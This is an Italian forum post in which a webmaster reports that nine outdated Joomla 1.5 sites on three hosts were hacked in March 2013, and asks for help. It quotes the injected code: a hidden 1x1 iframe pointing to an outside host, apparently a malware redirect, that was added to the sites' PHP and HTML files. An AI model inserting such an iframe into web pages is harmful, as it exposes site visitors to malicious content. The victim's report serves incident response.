Buongiorno,
ringrazio chiunque volesse intervernire perchè non so dove sbattere la testa.
Ad oggi è il nono sito web joomla hackerato su 3 servizi di hostig differenti e tutti gli attacchi sono avvenuti tra le ore 11.00 del 11/03/2013 e le ore 2.00 del 12/03/2012.
Descrizione dei vari siti web e dell'accaduto
Versione Joomla 1.5.18 a 1.5.23 (ok colpa mia non li ho aggiornati)
tutti i file con estensione php e html sono stati "aggiornati" e vi hanno integrato un codice il seguente:
<script language='JavaScript' type='text/javascript' iframe src="
http://u95d.info/in.cgi?default" height=1 width=1 frameborder=0>
NB non hanno corrotto tutti i siti web (ad oggi) ma solo alcuni.
Ora vi è qualcun altro coinvolto in questo hackeraggio ed eventalmente prima di trovarsi con molti più siti web defacciati una possibile soluzione.
Grazie in anticipo.
